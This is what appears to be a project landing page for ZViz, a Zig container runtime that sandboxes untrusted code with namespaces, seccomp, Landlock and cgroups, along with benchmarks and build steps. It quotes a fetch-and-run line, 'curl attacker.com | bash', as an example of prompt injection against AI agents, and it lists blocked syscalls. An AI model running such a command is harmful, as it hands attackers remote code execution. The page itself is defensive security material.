Skip to content
zviz zig build · run
OCI runtime · Zig · Linux 5.13+

Container isolation for code you can't trust but have to run.

ZViz is an OCI-compatible Zig container runtime that takes a selective denial approach. 132 syscalls reach the host kernel at native speed. 24 dangerous ones are blocked at the seccomp layer before any kernel code runs. One — socket — is argument-filtered inline. No userspace kernel. No daemon.

19/19 escape tests blocked 41/41 capabilities dropped ~8ms cold start ~2MB per container
~/zviz-bundle
$ zviz run hostile-tenant ~/bundle --verbose
[init] namespaces ............. user pid mount ipc uts
[init] capabilities ........... 41 dropped
[init] landlock ............... ruleset applied
[init] seccomp ................ 124-instr BPF loaded
[init] cgroups v2 ............. mem=512M pids=64
[ready] PID 1 in 7.8ms

[syscall] read(0, ...)                ALLOW
[syscall] write(1, ...)               ALLOW
[syscall] clock_gettime(...)          ALLOW
[syscall] socket(AF_PACKET, ...)      DENY  EPERM
[syscall] ptrace(...)                 DENY  EPERM
[syscall] mount(...)                  DENY  EPERM
[syscall] init_module(...)            DENY  EPERM
[broker]  socket(AF_INET, SOCK_STREAM, 0) inspected ok

Output shape based on README's --verbose behavior; not a recorded session.

The problem

You're running code you didn't write.

Containers built on namespaces and cgroups leave the full kernel attack surface exposed. Every runc escape CVE is a reminder that "containerized" isn't a security strategy.

AI agents executing LLM-generated code

One prompt injection from curl attacker.com | bash. Selective denial means the exploit fails at step 1.

CI pipelines on opaque dep trees

npm install on 47 transitive deps you have not audited. Drop caps, deny network, keep the build.

Third-party plugins that "need shell access"

Landlock restricts filesystem access. Capabilities cleared. The plugin lives in PID 1 of a fresh userns.

Multi-tenant workloads next to each other

Fresh user + pid + mount + ipc + uts namespace per container. The kernel boundary is the actual boundary.

Architecture

Five enforcement layers, applied in order.

Ordering is load-bearing. Capabilities drop before seccomp loads. Landlock applies before seccomp so its own setup syscalls aren't self-blocked.

01

Namespaces

user, pid, mount, ipc, uts — resource isolation

02

Capabilities

all 41 Linux capabilities dropped — no CAP_SYS_*

03

Landlock LSM

unprivileged filesystem access control

04

Seccomp-BPF

124-instruction filter — ALLOW / DENY / BROKER

05

cgroups v2

memory, PID, CPU limits — fork bombs contained

runc

App → Kernel (all syscalls available). Namespaces + cgroups only.

gVisor

App → Sentry userspace kernel (emulates ~300 syscalls) → Host kernel (~70).

ZViz

App → BPF filter → ALLOW (132, native) / DENY (24) / BROKER (mediated).

Measured

The performance tax goes away when you stop emulating.

Allowed syscalls hit the host kernel directly. gVisor routes everything through its Sentry process. The clock_gettime gap is extreme because Sentry can't use the kernel vDSO.

Numbers from the ZViz repo's demo.sh --perf with the same OCI bundle and statically-linked benchmark.

SyscallZVizgVisorSpeedup
clock_gettime20 ns4,982 ns249x
read212 ns4,393 ns20.7x
write211 ns1,169 ns5.5x
getuid202 ns1,125 ns5.6x
getpid297 ns1,209 ns4.1x
open_close2,895 ns4,403 ns1.5x
stat1,767 ns2,364 ns1.3x
Cold start
~8 ms
vs ~200ms gVisor
Memory
~2 MB
vs ~50MB Sentry
Policy match
98.2%
54/55 vs gVisor
Built-in profiles

Pick a profile, not a policy file.

Five named profiles cover the common shapes. Choose the closest, then narrow further if you need to.

--profile=ci-runner

CI / build systems

Default profile. Balanced security for general-purpose CI workloads.

--profile=web-server

HTTP APIs, services

Network allowed. Socket ops optimised for high-throughput request paths.

--profile=batch-job

Data processing, ETL

No network. Memory cap 8G. For pipelines that should not phone home.

--profile=hostile-tenant

Untrusted user code

Maximum restrictions. The right starting point for agent execution.

--profile=development

Debugging only

Allows ptrace. NOT for production. Useful for tracing why your prod profile is blocking something.

Honest trade-offs

When you should use gVisor instead.

ZViz blocks dangerous syscalls outright. gVisor emulates them in a sandboxed userspace kernel. Both achieve isolation. The approach matters for compatibility.

If your workload needs…UseWhy
ptrace (strace, debuggers)gVisorZViz blocks it. gVisor emulates safely.
mount / unshare (Docker-in-Docker)gVisorNested containers need namespace syscalls.
Bazel / Nix buildsgVisorInternal sandboxing creates namespaces.
Maximum syscall throughputZVizNative speed vs 5–250x emulation overhead.
Sub-10ms cold startsZViz~8ms vs ~200ms.
Strictest policy (block, don't emulate)ZVizExploit code fails immediately.

Simple rule: nested containers or process tracing → gVisor. Otherwise ZViz is faster and stricter.

Quick start

Build it, point it at an OCI bundle.

Linux 5.13+ for Landlock. cgroups v2. Zig 0.15.0+ to build from source. Any OCI rootfs works — including ones produced by docker export.

On Ubuntu 24.04+ install the bundled AppArmor profile so pivot_root survives apparmor_restrict_unprivileged_userns=1. Without it, ZViz falls back to chdir-only filesystem isolation.

$ git clone https://github.com/Skelf-Research/zviz.git
$ cd zviz && zig build -Doptimize=ReleaseSafe

# Ubuntu 24.04+: load the AppArmor profile
$ sudo install -m 0644 packaging/apparmor/zviz /etc/apparmor.d/zviz
$ sudo apparmor_parser -r /etc/apparmor.d/zviz

# Grab any image as an OCI rootfs
$ mkdir -p ~/zviz-bundle/rootfs
$ docker create --name extract redis:alpine
$ docker export extract | tar -C ~/zviz-bundle/rootfs -xf -
$ docker rm extract

# Write a minimal config.json, then:
$ ./zig-out/bin/zviz run my-container ~/zviz-bundle
[ready] PID 1 in 7.8ms

ZViz auto-mounts /proc (nosuid+nodev+noexec), /sys (read-only), and a private /dev tmpfs. You don't need mounts[] entries for those.